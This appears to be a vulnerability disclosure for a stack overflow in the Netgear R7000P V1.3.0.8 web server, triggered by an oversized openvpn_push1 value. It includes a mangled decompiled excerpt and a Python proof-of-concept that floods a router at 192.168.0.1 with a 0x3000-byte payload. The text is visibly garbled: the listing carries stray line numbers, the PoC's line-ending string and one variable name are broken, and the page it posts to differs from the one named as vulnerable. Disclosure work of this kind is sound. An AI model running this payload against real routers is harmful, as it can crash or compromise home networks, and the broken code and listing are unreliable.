

Netgear R7000P has a Stack Buffer Overflow Vulnerability

Product

- 1. product information: https://www.netgear.com
- 2. firmware download: http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.0.8_1.0.93.zip

Affected version

V1.3.0.8

Vulnerability

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_3C5AC function, which can be accessed via the URL http://routerlogin.net/OPENVPN.htm.

```
sub_1A54C(a1, "openvpn_protocol", v37, 8);
sub_1A54C(a1, "openvpn_service_port", v36, 8);
sub_1A54C(a1, "openvpn_br_ip_start", v31, 16);
sub_1A54C(a1, "openvpn_br_ip_end", v30, 16);
    48
    49
    50
    51
            sub 1A54C(a1, "openvpn server ip",
sub 1A54C(a1, "openvpn push1", v28
    52
            sub_1A54C(a1,
    53
                   if ( v28[0] )
240
   241
                     sprintf(dest, "push \"%s\"",
                                                                                      vuln
242
243
                       fprintf(v22,
                                             %s\n", dest);
   244
245
                   if (!strcmp(v32, "Redirect"))
   246
                     acosNvramConfig_set((int)"openvpnRedirect", (int)"enable");
strcpy(dest, "push \"redirect-gateway def1\"");
   247
248
   249
```

In this function, openvpn_push1 is controllable and will be passed into the v28 variable and v28 will be passed into stack dest by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

PoC

```
import socket
import os
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
11 = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
ip = '192.168.0.1'
port = 80
r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r.connect((ip, port))
rn = b' r n'
p1 = b'a' * 0x3000
p2 = b'openvpn_push1=' + p1 # payload
p3 = b"POST /WLG_wireless_dual_band_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"+rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2
r.send(p3)
response = r.recv(4096)
response = response.decode()
li(response)
```



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